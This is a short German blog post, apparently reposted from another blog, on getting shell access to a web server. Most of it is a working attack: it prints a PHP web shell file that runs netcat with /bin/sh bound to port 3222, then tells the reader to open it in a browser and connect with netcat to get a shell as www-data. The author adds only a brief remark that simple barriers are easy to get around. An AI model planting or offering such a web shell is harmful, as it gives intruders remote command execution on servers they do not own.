Eine Datei namens givemeshell.php erstellen und auf den Webserver laden, die sollte so was wie
<?php system("nc -lp 3222 -e /bin/sh"); ?>
enthalten. Danach die Datei per Webbrowser aufrufen und dann lokal
netcat webserver 3222
aufrufen. Und schon hat man unter Debian (Ubuntu sicherlich auch) eine shell als www-data.
Ich hab den Artikel erst nur überflogen, wohl weil ich damals schon einen LB eingesetzt habe und die Apache Server alle gut abgeschirmt sind. Es ist immer wieder interessant wie schnell man einfache Barrieren umgehen kann.
via nion’s blog
Ein Gedanke zu „how to get shell access in no mans land“